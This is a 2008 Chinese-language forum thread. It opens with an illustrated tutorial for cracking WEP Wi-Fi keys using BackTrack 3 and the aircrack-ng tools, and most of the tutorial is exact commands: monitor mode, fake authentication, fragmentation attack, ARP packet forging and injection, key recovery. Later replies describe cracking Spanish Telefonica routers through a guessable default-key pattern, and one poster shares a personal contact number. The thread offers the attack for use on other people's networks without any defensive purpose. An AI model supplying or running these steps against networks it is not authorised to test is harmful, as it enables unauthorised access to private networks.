无线破解之-WEP破解

zxy · 发表于 2008-3-8 14:07:17

BT3下破解无客户端wep简明教程（图文版）

1.接上篇教程,下载半安装(或刻盘)BT3后，在BT3下直接破解无客户端。现教程奉上.

2．启动BT3,打开一个窗口，输入ifconfig –a 查看网卡（顺便记下自己网卡的mac，后面要用到）

我的网卡是rausb0

再输入ifconfig –a rausb0加载usb网卡驱动

3.输入airmon-ng
start rausb0
6
激活网卡的Monitor模式

后面的6 是你要破解ap 的工作频道
根据实际，换成你破解的ap的实际工作频道（下同）

登录/注册后可看大图

4.输入抓包命令，抓包并查看你要破解的ap的essid
mac

输入命令
airodump-ng --ivs -w name -c 6 rausb0
，其中，rausb0是你破解用的网卡接口名（下同），这样，你的窗口将显示一个工作站，可以看到你要破解的ap的essid 和mac ，并记下ap的essid 和mac。

登录/注册后可看大图

5.上面窗口不关闭，另开一个窗口，输入命令，用自己的网卡连接要破解的ap

输入
aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0

这时，系统将回显

Sending Authentication Request

Authentication successful

Sending Association Request
Association successful :-)

登录/注册后可看大图

6．输入aireplay-ng
-5 -b ap的mac -h 自己网卡的mac rausb0
来获得xor文件

登录/注册后可看大图

如果一切顺利，系统将回显
Use this packet ?

输入y
回车，将得到一个至关重要的xor文件。

登录/注册后可看大图

再输入ls
查看当前目录，你将看到刚才生成的一个后缀名为xor 的文件。

登录/注册后可看大图

7．输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中，–l中的l是L的小写，别和1混淆，而其中的××××-××××.xor 是你刚才生成的文件名。

登录/注册后可看大图

系统回显：Wrote packet to: mrarp

zxy · 发表于 2008-3-8 14:13:26

8．输入aireplay-ng -2 –r mrarp
-x 1024 rausb0 ，发包攻击.其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是1024。

登录/注册后可看大图

输入y
回车
攻击开始

登录/注册后可看大图

这时，前面的抓包窗口上的data将迅速增加。

登录/注册后可看大图

到数据增加到3万以上时，另开窗口，启动

aircrack-ng -n 64 -b ap的mac name-01.ivs

其中
64 是64位密码，如果是128位，换成128即可。

登录/注册后可看大图

完成, 以上~~ 即 WEP密码~~ 有事可到俺的 Blog逛逛, 新东东俺都会往上面贴: www.axisgroup.com.cn/blog/
另~~ 如有可能请到俺朋友的坛子逛逛, 坛子刚建, 需要您的"热情"!

[ 本帖最后由 zxy 于 2008-3-8 14:01 编辑 ]

nobestname · 发表于 2008-3-8 14:23:47

完啦，我的帖子卖不动了。我改成free的吧，呵呵

dragonchina · 发表于 2008-3-8 15:05:46

这么麻烦幸亏没买啊买了也浪费啊

zxy · 发表于 2008-3-8 15:13:58

WEP破解,非常简单~~ 一个WEP, 至多1小时即可破解, 至于 WAP 就得看运气了~~ 不过西班牙, Telefonica的路由器出厂密码全都内置WEP~~~ 而老外基本上都不改这玩意.... 故~~ 楼上的不学学, N亏的说!

戀戀︷星梦缘 · 发表于 2008-3-9 02:20:15

看不懂的说

非典型帅哥 · 发表于 2008-3-9 07:41:41

免费的一定要顶~！！
另外2楼的帖怎么删了？

zxy · 发表于 2008-3-10 10:32:06

:) 楼上的, 有钱人!

传说中的谁 · 发表于 2008-3-10 20:26:56

telefonica的WEP有一定的规律，我破过好几个~
西班牙人也出了好几个LIVECD
比如WIFIWAY和WIFISLAX~
最近破解的人都用BT3~

zxy · 发表于 2008-3-10 23:01:35

规律跟 Telefonica Router WEP 根本就拉不上关系~~ 要是能根据规律破~~ 大家何必辛苦抓包? 西班牙所谓的 LiveCD?? 你指的是 www.telefonica.net 这个网站上的东东,还是... ?

nobestname · 发表于 2008-3-10 23:38:48

有西班牙网站专门介绍 SSID 为 WLAN_XX的默认密码（不是西班牙人都是电脑盲，一直使用默认密码），西语好的同学可以去搜搜看，我是看不懂的。

另，楼主，你帖子里的BT3也是Live CD中的一种(基于Linuxn内核无需安装的光盘启动操作系统)

传说中的谁 · 发表于 2008-3-11 10:46:13

原帖由 zxy 于 2008-3-10 22:01 发表

 登录/注册后可看大图

规律跟 Telefonica Router WEP 根本就拉不上关系~~ 要是能根据规律破~~ 大家何必辛苦抓包? 西班牙所谓的 LiveCD?? 你指的是 www.telefonica.net 这个网站上的东东,还是... ? ...

楼主此言差矣~
有规律的WEP加密可以促使WEP加速破解~~
我破过的几个WLAN_开头的，基本都是X开头，加MAC的前6位，再加4位随机数字和字母，最后两位是SSID，比如WLAN_A1,最后两位就是A1~
这样，就可以用少量的包去破WEP了~~~
楼主懂了吗~

zxy · 发表于 2008-3-11 11:30:34

回~nobestname, 贴子里用的是 LiveCD, 但自己用的是 USB + 八木+linksys wusb54g~~
另~~传说中的谁
请问您所说的规律,试问就算清楚该规律,用BT3或其他不还是得抓包,"至多"一个只需抓1万~3万,一个得3万以上. 在信号够强的情况下,且支持注入. 攻击抓包 1万个数据包大概只需2~3分钟,而信号垃圾, 你抓1000都得NN分钟. 难不成楼上的, 您的水平已高至可以写内核,或是 PHP脚本?

zxy · 发表于 2008-3-11 11:31:31

另~~ 忘说个事了~~ :) 俺破的 Telefonica的都是以 Z打头的~~ :) 这就是所谓的规律?

传说中的谁 · 发表于 2008-3-11 12:04:52

不同批次的都有不同字母开头的~
我是说我所碰到的大部分的都是X开头的~
我所说的规律就象你所说的~
假设一个WEP密码需要30W个包~
而那个路由信号不是很好，一天只能抓1W个包~
如果有这条规律来寻找，可能只要5W个包，只需要5天的时间来抓~
而不是30天~~
破解更多在于寻找便捷的方式~

zxy · 发表于 2008-3-11 12:14:31

汗~~  WEP 如果花上几天的时间才能破解~~~~  俺对这玩意是没啥兴趣的!!
必定实用的技术才是最好的~~ 就跟以前的BT2一样~~ 俺花了三天时间占用了女友的电脑破了个WEP, 女友差点没把俺给蹂躏死~~!
这也是为何BT2问世已有两年, 但普及不高~~ BT3一露像全世界都知道的原因!! :)  玩笑之言:)

传说中的谁 · 发表于 2008-3-11 12:16:06

看来楼主只把它当作一中生活中的工具~
而不是当它是一中知识拿来研究~
那么我也没有继续讨论下去的意义了~

zxy · 发表于 2008-3-11 12:19:42

传说中的谁~~ 您是哪个公司的? 交个朋友, 在西电脑水平能达到一定层次的华人不多的说!!
鄙人~~ 现就职于 XXXXX, 您呢?

[ 本帖最后由 zxy 于 2008-3-11 13:34 编辑 ]

zxy · 发表于 2008-3-11 12:25:04

另~~ 传说中的谁, 如有兴趣交流, 可换个话题, 必定 WEP破解现已是地球人都知道的事!!

传说中的谁 · 发表于 2008-3-11 12:27:47

我曾经在青田卖了3年的电脑~
现在在马德里做照相馆工作~
出来已经有一年多咯~~
有兴趣的话加我QQ 4704390吧~
这边对电脑有兴趣的人实在很少~

		自动登录	找回密码
密码			立即注册